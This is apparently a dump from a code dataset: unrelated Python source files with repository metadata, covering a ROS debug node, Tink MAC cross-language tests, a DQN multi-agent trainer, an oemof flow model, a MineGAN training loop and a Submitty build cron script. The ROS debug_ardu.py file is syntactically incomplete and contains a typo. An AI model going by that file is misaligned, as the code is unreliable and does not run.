out = hex
elif testcase[1] == "blake2s":
out = hex
self.assertEqual(inout[1], out)
| 41.138158
| 191
| 0.560371
|
4a18d362f8c86407938eca7b648ffd90ce5c5b8c
| 1,885
|
py
|
Python
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 3
|
2019-06-20T04:17:54.000Z
|
2020-07-17T15:34:14.000Z
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 1
|
2018-03-31T09:48:58.000Z
|
2018-03-31T09:48:58.000Z
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 6
|
2018-03-30T12:24:25.000Z
|
2020-07-17T15:33:48.000Z
|
#!/usr/bin/env python
################################################################################
##
## MIT License
##
## Copyright (c) 2018 Team Roborex, NIT Rourkela
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
##
################################################################################
################################################################################
##
## AUTHORS: Prabin Rath
##
################################################################################
import rospy
from std_msgs.msg import String
filter_flag=False
def callback(data):
if data.data=='ok' and filter_flag==False:
print(data.data)
filter_flag=True;
if data.dat!='ok':
def debug_ardu():
rospy.init_node('debug_ardu')
rospy.Subscriber('user_swh', String, callback)
rospy.spin()
if __name__ == '__main__':
debug_ardu()
| 36.25
| 81
| 0.612202
|
4a18d37c75da750ba721c5f1647bbe8a50b21586
| 5,706
|
py
|
Python
|
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cross-language tests for the MAC primitive."""
from absl.testing import absltest
from absl.testing import parameterized
import tink
from tink import mac
from tink.proto import common_pb2
from tink.proto import tink_pb2
from util import keyset_builder
from util import supported_key_types
from util import testing_servers
SUPPORTED_LANGUAGES = testing_servers.SUPPORTED_LANGUAGES_BY_PRIMITIVE['mac']
def key_rotation_test_cases():
for compute_lang in SUPPORTED_LANGUAGES:
for verify_lang in SUPPORTED_LANGUAGES:
for prefix in [tink_pb2.RAW, tink_pb2.TINK]:
old_key_tmpl = mac.mac_key_templates.create_hmac_key_template(
key_size=32, tag_size=16, hash_type=common_pb2.SHA256)
old_key_tmpl.output_prefix_type = prefix
new_key_tmpl = mac.mac_key_templates.HMAC_SHA512_512BITTAG
yield (compute_lang, verify_lang, old_key_tmpl, new_key_tmpl)
def setUpModule():
mac.register()
testing_servers.start('mac')
def tearDownModule():
testing_servers.stop()
class MacTest(parameterized.TestCase):
@parameterized.parameters(
supported_key_types.test_cases(supported_key_types.MAC_KEY_TYPES))
def test_encrypt_decrypt(self, key_template_name, supported_langs):
self.assertNotEmpty(supported_langs)
key_template = supported_key_types.KEY_TEMPLATE[key_template_name]
# Take the first supported language to generate the keyset.
keyset = testing_servers.new_keyset(supported_langs[0], key_template)
supported_macs = [
testing_servers.mac(lang, keyset) for lang in supported_langs
]
unsupported_macs = [
testing_servers.mac(lang, keyset)
for lang in SUPPORTED_LANGUAGES
if lang not in supported_langs
]
for p in supported_macs:
data = (
b'This is some data to be authenticated using key_template '
b'%s in %s.' % (key_template_name.encode('utf8'),
p.lang.encode('utf8')))
mac_value = p.compute_mac(data)
for p2 in supported_macs:
self.assertIsNone(p2.verify_mac(mac_value, data))
for p2 in unsupported_macs:
with self.assertRaises(tink.TinkError):
p2.verify_mac(mac_value, data)
for p in unsupported_macs:
with self.assertRaises(tink.TinkError):
p.compute_mac(data)
@parameterized.parameters(key_rotation_test_cases())
def test_key_rotation(
self, compute_lang, verify_lang, old_key_tmpl, new_key_tmpl):
# Do a key rotation from an old key generated from old_key_tmpl to a new
# key generated from new_key_tmpl. MAC computation and verification are done
# in languages compute_lang and verify_lang.
builder = keyset_builder.new_keyset_builder()
older_key_id = builder.add_new_key(old_key_tmpl)
builder.set_primary_key(older_key_id)
compute_mac1 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac1 = testing_servers.mac(verify_lang, builder.keyset())
newer_key_id = builder.add_new_key(new_key_tmpl)
compute_mac2 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac2 = testing_servers.mac(verify_lang, builder.keyset())
builder.set_primary_key(newer_key_id)
compute_mac3 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac3 = testing_servers.mac(verify_lang, builder.keyset())
builder.disable_key(older_key_id)
compute_mac4 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac4 = testing_servers.mac(verify_lang, builder.keyset())
self.assertNotEqual(older_key_id, newer_key_id)
# 1 uses the older key. So 1, 2 and 3 can verify the mac, but not 4.
mac_value1 = compute_mac1.compute_mac(b'plaintext')
verify_mac1.verify_mac(mac_value1, b'plaintext')
verify_mac2.verify_mac(mac_value1, b'plaintext')
verify_mac3.verify_mac(mac_value1, b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac4.verify_mac(mac_value1, b'plaintext')
# 2 uses the older key. So 1, 2 and 3 can verify the mac, but not 4.
mac_value2 = compute_mac2.compute_mac(b'plaintext')
verify_mac1.verify_mac(mac_value2, b'plaintext')
verify_mac2.verify_mac(mac_value2, b'plaintext')
verify_mac3.verify_mac(mac_value2, b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac4.verify_mac(mac_value2, b'plaintext')
# 3 uses the newer key. So 2, 3 and 4 can verify the mac, but not 1.
mac_value3 = compute_mac3.compute_mac(b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac1.verify_mac(mac_value3, b'plaintext')
verify_mac2.verify_mac(mac_value3, b'plaintext')
verify_mac3.verify_mac(mac_value3, b'plaintext')
verify_mac4.verify_mac(mac_value3, b'plaintext')
# 4 uses the newer key. So 2, 3 and 4 can verify the mac, but not 1.
mac_value4 = compute_mac4.compute_mac(b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac1.verify_mac(mac_value4, b'plaintext')
verify_mac2.verify_mac(mac_value4, b'plaintext')
verify_mac3.verify_mac(mac_value4, b'plaintext')
verify_mac4.verify_mac(mac_value4, b'plaintext')
if __name__ == '__main__':
absltest.main()
| 41.05036
| 80
| 0.746057
|
4a18d61df539e0d271a324425ce4ca91105d12ff
| 3,508
|
py
|
Python
|
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | 4
|
2021-12-17T08:00:28.000Z
|
2022-02-12T12:25:24.000Z
|
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | null | null | null |
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | null | null | null |
from pettingzoo.magent import battle_v2
from RL_brainDQN import DeepQNetwork
import csv
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
def change_observation(observation):
observation = observation.tolist()
new_list = []
for i in range(len(observation)):
for j in range(len(observation[i])):
for k in range(len(observation[i][j])):
new_list.append(observation[i][j][k])
new_observation = np.array(new_list)
return new_observation
def run_battle(parallel_env):
step = 0
with open('pettingzoomagentDQN.csv', 'w+') as myfile:
myfile.write('{0},{1},{2}\n'.format("Episode", "sumofrewards(DQN)", "sumofrewards(DQN)"))
num_episode = 0
while num_episode < 2000:
agent_num = 0
observation = parallel_env.reset()
list_tmp = [0]
accumulated_reward = [0,0]
max_cycles = 500
actions = {}
for step in range(max_cycles):
team_size = [0,0]
for agent in parallel_env.agents:
agent_observation = observation[agent]
agent_observation = change_observation(agent_observation)
action = RL[agent].choose_action(agent_observation)
actions[agent] = action
new_observation, rewards, dones, infos = parallel_env.step(actions)
if not parallel_env.agents:
break
for agent in parallel_env.agents:
if "red" in agent:
team = 0
else:
team = 1
accumulated_reward[team] = accumulated_reward[team] + rewards[agent]
agent_observation = observation[agent]
agent_observation = change_observation(agent_observation)
agent_nextobservation = new_observation[agent]
agent_nextobservation = change_observation(agent_nextobservation)
RL[agent].store_transition(agent_observation, actions[agent], rewards[agent], agent_nextobservation)
observation = new_observation
print("The step we are at is", step)
for agent in parallel_env.agents:
RL[agent].learn()
print("The episode is", num_episode)
with open('pettingzoomagentDQN.csv', 'a') as myfile:
myfile.write('{0},{1},{2}\n'.format(num_episode, accumulated_reward[0], accumulated_reward[1]))
num_episode = num_episode + 1
team_size = parallel_env.team_size()
print("The number of red agents alive is", team_size[0])
print("The number of blue agents alive is", team_size[1])
for agent in parallel_env.agents:
RL[agent].save_model("./"+agent+"/dqnmodel.ckpt")
# end of game
print('game over')
if __name__ == "__main__":
parallel_env = battle_v2.parallel_env(map_size = 28, attack_opponent_reward=5)
parallel_env.seed(1)
RL = {}
sess = tf.Session()
size = len(parallel_env.agents)
for agent in parallel_env.agents:
new_name = agent
RL[agent] = DeepQNetwork(21,6929, sess, name = new_name)
sess.run(tf.global_variables_initializer())
run_battle(parallel_env)
| 31.603604
| 116
| 0.574971
|
4a18d63bf253d6255e1ed516047eae50cffccf8e
| 10,574
|
py
|
Python
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 59
|
2020-04-01T12:02:37.000Z
|
2022-03-26T06:31:06.000Z
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 170
|
2020-03-31T12:04:26.000Z
|
2022-03-31T15:41:04.000Z
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 33
|
2020-04-28T11:17:09.000Z
|
2022-03-14T21:25:08.000Z
|
# -*- coding: utf-8 -*-
"""Creating sets, variables, constraints and parts of the objective function
for Flow objects.
SPDX-FileCopyrightText: Uwe Krien <krien@uni-bremen.de>
SPDX-FileCopyrightText: Simon Hilpert
SPDX-FileCopyrightText: Cord Kaldemeyer
SPDX-FileCopyrightText: Patrik Schönfeldt
SPDX-FileCopyrightText: Birgit Schachler
SPDX-FileCopyrightText: jnnr
SPDX-FileCopyrightText: jmloenneberga
SPDX-License-Identifier: MIT
"""
from pyomo.core import BuildAction
from pyomo.core import Constraint
from pyomo.core import NonNegativeIntegers
from pyomo.core import Set
from pyomo.core import Var
from pyomo.core.base.block import SimpleBlock
class Flow(SimpleBlock):
r""" Flow block with definitions for standard flows.
**The following variables are created**:
negative_gradient :
Difference of a flow in consecutive timesteps if flow is reduced
indexed by NEGATIVE_GRADIENT_FLOWS, TIMESTEPS.
positive_gradient :
Difference of a flow in consecutive timesteps if flow is increased
indexed by NEGATIVE_GRADIENT_FLOWS, TIMESTEPS.
**The following sets are created:** (-> see basic sets at :class:`.Model` )
SUMMED_MAX_FLOWS
A set of flows with the attribute :attr:`summed_max` being not None.
SUMMED_MIN_FLOWS
A set of flows with the attribute :attr:`summed_min` being not None.
NEGATIVE_GRADIENT_FLOWS
A set of flows with the attribute :attr:`negative_gradient` being not
None.
POSITIVE_GRADIENT_FLOWS
A set of flows with the attribute :attr:`positive_gradient` being not
None
INTEGER_FLOWS
A set of flows where the attribute :attr:`integer` is True (forces flow
to only take integer values)
**The following constraints are build:**
Flow max sum :attr:`om.Flow.summed_max[i, o]`
.. math::
\sum_t flow(i, o, t) \cdot \tau
\leq summed\_max(i, o) \cdot nominal\_value(i, o), \\
\forall (i, o) \in \textrm{SUMMED\_MAX\_FLOWS}.
Flow min sum :attr:`om.Flow.summed_min[i, o]`
.. math::
\sum_t flow(i, o, t) \cdot \tau
\geq summed\_min(i, o) \cdot nominal\_value(i, o), \\
\forall (i, o) \in \textrm{SUMMED\_MIN\_FLOWS}.
Negative gradient constraint
:attr:`om.Flow.negative_gradient_constr[i, o]`:
.. math::
flow(i, o, t-1) - flow(i, o, t) \geq \
negative\_gradient(i, o, t), \\
\forall (i, o) \in \textrm{NEGATIVE\_GRADIENT\_FLOWS}, \\
\forall t \in \textrm{TIMESTEPS}.
Positive gradient constraint
:attr:`om.Flow.positive_gradient_constr[i, o]`:
.. math:: flow(i, o, t) - flow(i, o, t-1) \geq \
positive\__gradient(i, o, t), \\
\forall (i, o) \in \textrm{POSITIVE\_GRADIENT\_FLOWS}, \\
\forall t \in \textrm{TIMESTEPS}.
**The following parts of the objective function are created:**
If :attr:`variable_costs` are set by the user:
.. math::
\sum_{(i,o)} \sum_t flow(i, o, t) \cdot variable\_costs(i, o, t)
The expression can be accessed by :attr:`om.Flow.variable_costs` and
their value after optimization by :meth:`om.Flow.variable_costs()` .
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _create(self, group=None):
r"""Creates sets, variables and constraints for all standard flows.
Parameters
----------
group : list
List containing tuples containing flow (f) objects and the
associated source (s) and target (t)
of flow e.g. groups=[(s1, t1, f1), (s2, t2, f2),..]
"""
if group is None:
return None
m = self.parent_block()
# ########################## SETS #################################
# set for all flows with an global limit on the flow over time
self.SUMMED_MAX_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].summed_max is not None
and g[2].nominal_value is not None
]
)
self.SUMMED_MIN_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].summed_min is not None
and g[2].nominal_value is not None
]
)
self.NEGATIVE_GRADIENT_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].negative_gradient["ub"][0] is not None
]
)
self.POSITIVE_GRADIENT_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].positive_gradient["ub"][0] is not None
]
)
self.INTEGER_FLOWS = Set(
initialize=[(g[0], g[1]) for g in group if g[2].integer]
)
# ######################### Variables ################################
self.positive_gradient = Var(self.POSITIVE_GRADIENT_FLOWS, m.TIMESTEPS)
self.negative_gradient = Var(self.NEGATIVE_GRADIENT_FLOWS, m.TIMESTEPS)
self.integer_flow = Var(
self.INTEGER_FLOWS, m.TIMESTEPS, within=NonNegativeIntegers
)
# set upper bound of gradient variable
for i, o, f in group:
if m.flows[i, o].positive_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
self.positive_gradient[i, o, t].setub(
f.positive_gradient["ub"][t] * f.nominal_value
)
if m.flows[i, o].negative_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
self.negative_gradient[i, o, t].setub(
f.negative_gradient["ub"][t] * f.nominal_value
)
# ######################### CONSTRAINTS ###############################
def _flow_summed_max_rule(model):
"""Rule definition for build action of max. sum flow constraint."""
for inp, out in self.SUMMED_MAX_FLOWS:
lhs = sum(
m.flow[inp, out, ts] * m.timeincrement[ts]
for ts in m.TIMESTEPS
)
rhs = (
m.flows[inp, out].summed_max
* m.flows[inp, out].nominal_value
)
self.summed_max.add((inp, out), lhs <= rhs)
self.summed_max = Constraint(self.SUMMED_MAX_FLOWS, noruleinit=True)
self.summed_max_build = BuildAction(rule=_flow_summed_max_rule)
def _flow_summed_min_rule(model):
"""Rule definition for build action of min. sum flow constraint."""
for inp, out in self.SUMMED_MIN_FLOWS:
lhs = sum(
m.flow[inp, out, ts] * m.timeincrement[ts]
for ts in m.TIMESTEPS
)
rhs = (
m.flows[inp, out].summed_min
* m.flows[inp, out].nominal_value
)
self.summed_min.add((inp, out), lhs >= rhs)
self.summed_min = Constraint(self.SUMMED_MIN_FLOWS, noruleinit=True)
self.summed_min_build = BuildAction(rule=_flow_summed_min_rule)
def _positive_gradient_flow_rule(model):
"""Rule definition for positive gradient constraint."""
for inp, out in self.POSITIVE_GRADIENT_FLOWS:
for ts in m.TIMESTEPS:
if ts > 0:
lhs = m.flow[inp, out, ts] - m.flow[inp, out, ts - 1]
rhs = self.positive_gradient[inp, out, ts]
self.positive_gradient_constr.add(
(inp, out, ts), lhs <= rhs
)
else:
pass # return(Constraint.Skip)
self.positive_gradient_constr = Constraint(
self.POSITIVE_GRADIENT_FLOWS, m.TIMESTEPS, noruleinit=True
)
self.positive_gradient_build = BuildAction(
rule=_positive_gradient_flow_rule
)
def _negative_gradient_flow_rule(model):
"""Rule definition for negative gradient constraint."""
for inp, out in self.NEGATIVE_GRADIENT_FLOWS:
for ts in m.TIMESTEPS:
if ts > 0:
lhs = m.flow[inp, out, ts - 1] - m.flow[inp, out, ts]
rhs = self.negative_gradient[inp, out, ts]
self.negative_gradient_constr.add(
(inp, out, ts), lhs <= rhs
)
else:
pass # return(Constraint.Skip)
self.negative_gradient_constr = Constraint(
self.NEGATIVE_GRADIENT_FLOWS, m.TIMESTEPS, noruleinit=True
)
self.negative_gradient_build = BuildAction(
rule=_negative_gradient_flow_rule
)
def _integer_flow_rule(block, ii, oi, ti):
"""Force flow variable to NonNegativeInteger values."""
return self.integer_flow[ii, oi, ti] == m.flow[ii, oi, ti]
self.integer_flow_constr = Constraint(
self.INTEGER_FLOWS, m.TIMESTEPS, rule=_integer_flow_rule
)
def _objective_expression(self):
r"""Objective expression for all standard flows with fixed costs
and variable costs.
"""
m = self.parent_block()
variable_costs = 0
gradient_costs = 0
for i, o in m.FLOWS:
if m.flows[i, o].variable_costs[0] is not None:
for t in m.TIMESTEPS:
variable_costs += (
m.flow[i, o, t]
* m.objective_weighting[t]
* m.flows[i, o].variable_costs[t]
)
if m.flows[i, o].positive_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
gradient_costs += (
self.positive_gradient[i, o, t]
* m.flows[i, o].positive_gradient["costs"]
)
if m.flows[i, o].negative_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
gradient_costs += (
self.negative_gradient[i, o, t]
* m.flows[i, o].negative_gradient["costs"]
)
return variable_costs + gradient_costs
| 36.588235
| 79
| 0.541517
|
4a18d6b287ccd5eb645aac0cc2d74f142457f0a2
| 9,576
|
py
|
Python
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 76
|
2020-03-04T16:25:10.000Z
|
2022-03-25T08:58:18.000Z
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 7
|
2020-05-24T07:02:44.000Z
|
2022-02-10T01:57:40.000Z
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 9
|
2020-07-04T16:35:14.000Z
|
2022-03-12T06:20:40.000Z
|
""" BigGAN: The Authorized Unofficial PyTorch release
Code by A. Brock and A. Andonian
This code is an unofficial reimplementation of
"Large-Scale GAN Training for High Fidelity Natural Image Synthesis,"
by A. Brock, J. Donahue, and K. Simonyan (arXiv 1809.11096).
Let's go.
"""
import os
import functools
import math
import numpy as np
from tqdm import tqdm, trange
import torch
import torch.nn as nn
from torch.nn import init
import torch.optim as optim
import torch.nn.functional as F
from torch.nn import Parameter as P
# Import my stuff
import inception_utils
import utils
import losses
import train_fns
from sync_batchnorm import patch_replication_callback
import pdb
# The main training file. Config is a dictionary specifying the configuration
# of this training run.
def run(config):
# Update the config dict as necessary
# This is for convenience, to add settings derived from the user-specified
# configuration into the config-dict (e.g. inferring the number of classes
# and size of the images from the dataset, passing in a pytorch object
# for the activation specified as a string)
config['resolution'] = utils.imsize_dict[config['dataset']]
config['n_classes'] = utils.nclass_dict[config['dataset']]
config['G_activation'] = utils.activation_dict[config['G_nl']]
config['D_activation'] = utils.activation_dict[config['D_nl']]
# By default, skip init if resuming training.
if config['resume']:
print('Skipping initialization for training resumption...')
config['skip_init'] = True
config = utils.update_config_roots(config)
device = 'cuda'
# Seed RNG
utils.seed_rng(config['seed'])
# Prepare root folders if necessary
utils.prepare_root(config)
# Setup cudnn.benchmark for free speed
torch.backends.cudnn.benchmark = True
# Import the model--this line allows us to dynamically select different files.
model = __import__(config['model'])
experiment_name = (config['experiment_name'] if config['experiment_name']
else utils.name_from_config(config))
print('Experiment name is %s' % experiment_name)
# Next, build the model
# Minor
M = model.Minor(**config).to(device)
G = model.Generator(**config).to(device)
D = model.Discriminator(**config).to(device)
# If using EMA, prepare it
if config['ema']:
print('Preparing EMA for G with decay of {}'.format(config['ema_decay']))
G_ema = model.Generator(**{**config, 'skip_init':True,
'no_optim': True}).to(device)
ema = utils.ema(G, G_ema, config['ema_decay'], config['ema_start'])
else:
G_ema, ema = None, None
# FP16?
if config['G_fp16']:# yaxing: hert it is False
print('Casting G to float16...')
G = G.half()
if config['ema']:
G_ema = G_ema.half()
if config['D_fp16']:# yaxing: hert it is False
print('Casting D to fp16...')
D = D.half()
# Consider automatically reducing SN_eps?
GD = model.G_D(G, D, M)
print(G)
print(D)
print(M)
print('Number of params in G: {} D: {} M: {}'.format(
*[sum([p.data.nelement() for p in net.parameters()]) for net in [G,D,M]]))
# Prepare state dict, which holds things like epoch # and itr #
state_dict = {'itr': 0, 'epoch': 0, 'save_num': 0, 'save_best_num': 0,
'best_IS': 0, 'best_FID': 999999, 'config': config}
# If loading from a pre-trained model, load weights
if config['resume']:
print('Loading weights...')
utils.load_weights(G, D, M, state_dict,
config['weights_root'], experiment_name,
config['load_weights'] if config['load_weights'] else None,
G_ema if config['ema'] else None)
# If parallel, parallelize the GD module
if config['parallel']:
GD = nn.DataParallel(GD)
if config['cross_replica']:
patch_replication_callback(GD)
# Prepare loggers for stats; metrics holds test metrics,
# lmetrics holds any desired training metrics.
test_metrics_fname = '%s/%s_log.jsonl' % (config['logs_root'],
experiment_name)
train_metrics_fname = '%s/%s' % (config['logs_root'], experiment_name)
print('Inception Metrics will be saved to {}'.format(test_metrics_fname))
test_log = utils.MetricsLogger(test_metrics_fname,
reinitialize=(not config['resume']))
print('Training Metrics will be saved to {}'.format(train_metrics_fname))
train_log = utils.MyLogger(train_metrics_fname,
reinitialize=(not config['resume']),
logstyle=config['logstyle'])
# Write metadata
utils.write_metadata(config['logs_root'], experiment_name, config, state_dict)
# Prepare data; the Discriminator's batch size is all that needs to be passed
# to the dataloader, as G doesn't require dataloading.
# Note that at every loader iteration we pass in enough data to complete
# a full D iteration (regardless of number of D steps and accumulations)
D_batch_size = (config['batch_size'] * config['num_D_steps']
* config['num_D_accumulations'])
loaders = utils.get_data_loaders(**{**config, 'batch_size': D_batch_size,
'start_itr': state_dict['itr']})
# Prepare inception metrics: FID and IS
get_inception_metrics = inception_utils.prepare_inception_metrics(config['dataset'], config['parallel'], config['no_fid'])
# Prepare noise and randomly sampled label arrays
# Allow for different batch sizes in G
G_batch_size = max(config['G_batch_size'], config['batch_size'])
z_, y_ = utils.prepare_z_y(G_batch_size, G.dim_z, config['n_classes'],
device=device, fp16=config['G_fp16'])
# Prepare a fixed z & y to see individual sample evolution throghout training
fixed_z, fixed_y = utils.prepare_z_y(G_batch_size, G.dim_z,
config['n_classes'], device=device,
fp16=config['G_fp16'])
fixed_z.sample_()
fixed_y.sample_()
# Loaders are loaded, prepare the training function
if config['which_train_fn'] == 'GAN': # yaxing: here it is GAN
train = train_fns.GAN_training_function(G, D, M, GD, z_, y_,
ema, state_dict, config)
# Else, assume debugging and use the dummy train fn
else:
train = train_fns.dummy_training_function()
# Prepare Sample function for use with inception metrics
sample = functools.partial(utils.sample,
G=(G_ema if config['ema'] and config['use_ema']
else G), M=M,
z_=z_, y_=y_, config=config)
print('Beginning training at epoch %d...' % state_dict['epoch'])
# Train for specified number of epochs, although we mostly track G iterations.
for epoch in range(state_dict['epoch'], config['num_epochs']):
#for epoch in range(state_dict['epoch'], 7):
# Which progressbar to use? TQDM or my own?
if config['pbar'] == 'mine':# yaxing: hert it is 'mine'
pbar = utils.progress(loaders[0],displaytype='s1k' if config['use_multiepoch_sampler'] else 'eta')
else:
pbar = tqdm(loaders[0])
for i, (x, y) in enumerate(pbar):
# Increment the iteration counter
state_dict['itr'] += 1
# Make sure G and D are in training mode, just in case they got set to eval
# For D, which typically doesn't have BN, this shouldn't matter much.
G.train()
D.train()
M.train()
if config['ema']:
G_ema.train()
if config['D_fp16']: # yaxing: hert it is False
x, y = x.to(device).half(), y.to(device)
else:
x, y = x.to(device), y.to(device)
if state_dict['itr'] < (138000 + 300): # 138000 is the last iteration of the BigGAN
stage = 1
else:
stage = 2
metrics = train(x, y, stage)
train_log.log(itr=int(state_dict['itr']), **metrics)
# Every sv_log_interval, log singular values
if (config['sv_log_interval'] > 0) and (not (state_dict['itr'] % config['sv_log_interval'])):
train_log.log(itr=int(state_dict['itr']),
**{**utils.get_SVs(G, 'G'), **utils.get_SVs(D, 'D')})
# If using my progbar, print metrics.
if config['pbar'] == 'mine':
print(', '.join(['itr: %d' % state_dict['itr']]
+ ['%s : %+4.3f' % (key, metrics[key])
for key in metrics]), end=' ')
# Save weights and copies as configured at specified interval
if not (state_dict['itr'] % config['save_every']):
if config['G_eval_mode']:
print('Switchin G to eval mode...')
G.eval()
M.eval()
if config['ema']:
G_ema.eval()
train_fns.save_and_sample(G, D,M, G_ema, z_, y_, fixed_z, fixed_y,
state_dict, config, experiment_name)
# Test every specified interval
if not (state_dict['itr'] % config['test_every']):
if config['G_eval_mode']:
print('Switchin G to eval mode...')
G.eval()
M.eval()
train_fns.test(G, D, G_ema, z_, y_, state_dict, config, sample,
get_inception_metrics, experiment_name, test_log)
state_dict['epoch'] += 1
def main():
# parse command line and run
parser = utils.prepare_parser()
config = vars(parser.parse_args())
print(config)
run(config)
if __name__ == '__main__':
main()
| 40.066946
| 124
| 0.630952
|
4a18d7178bb4a6c0c00aa1833d7fa406ffacbb15
| 2,889
|
py
|
Python
|
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# This script is run by a cron job as the DAEMON_USER
#
# Regularly checks a queue to rebuild assignment configurations for recently modified gradeables.
#
import os
import pwd
import time
import subprocess
from submitty_utils import glob
import json
# ------------------------------------------------------------------------
def build_one(data):
semester = data["semester"]
course = data["course"]
# construct the paths for this course
build_script = "/var/local/submitty/courses/" + semester + "/" + course + "/BUILD_" + course + ".sh"
build_output = "/var/local/submitty/courses/" + semester + "/" + course + "/build_script_output.txt"
# construct the command line to build/rebuild/clean/delete the gradeable
build_args = [build_script]
if "gradeable" in data:
build_args.append(data["gradeable"])
if "clean" in data:
build_args.append("--clean")
if "no_build" in data:
build_args.append("--no_build")
with open(build_output, "w") as open_file:
subprocess.call(build_args, stdout=open_file, stderr=open_file)
# ------------------------------------------------------------------------
def build_all():
for filename in glob.iglob("/var/local/submitty/to_be_built/*.json"):
with open(filename) as data_file:
print("going to process: " + filename)
data = json.load(data_file)
# after loading the contents of the file, remove it first
os.remove(filename)
# then build it, because build is slow (and we might have a race condition)
build_one(data)
print("finished with " + filename)
# ------------------------------------------------------------------------
# MAIN LOOP
# this script should only run for 5 minutes, then another process running
# this script will take over
# ------------------------------------------------------------------------
# this script is intended to be run only from the cron job of DAEMON_USER
def main():
username = pwd.getpwuid(os.getuid()).pw_name
if username != "submitty_daemon":
raise SystemError("ERROR! This script must be run by submitty_daemon")
# ensure future pushd & popd commands don't complain
os.chdir("/var/local/submitty/to_be_built/")
start = time.time()
count = 0
while True:
count += 1
now = time.time()
formattedtime = time.strftime('%X %x %Z')
print("{:s} build_config_upload.py loop {:d}".format(formattedtime, count))
build_all()
# stop if its been more than 5 minutes
if (now-start) >= 5 * 60:
print ("exiting for time")
raise SystemExit()
# sleep for 5 seconds
time.sleep(5)
# ------------------------------------------------------------------------
if __name__ == "__main__":
main()
| 32.460674
| 104
| 0.563517
|
4a18d789acfe6bb45d01b597f7252d7be551cb82
| 813
|
py
|
Python
|
spark_auto_mapper_fhir/value_sets/v2_0372.py
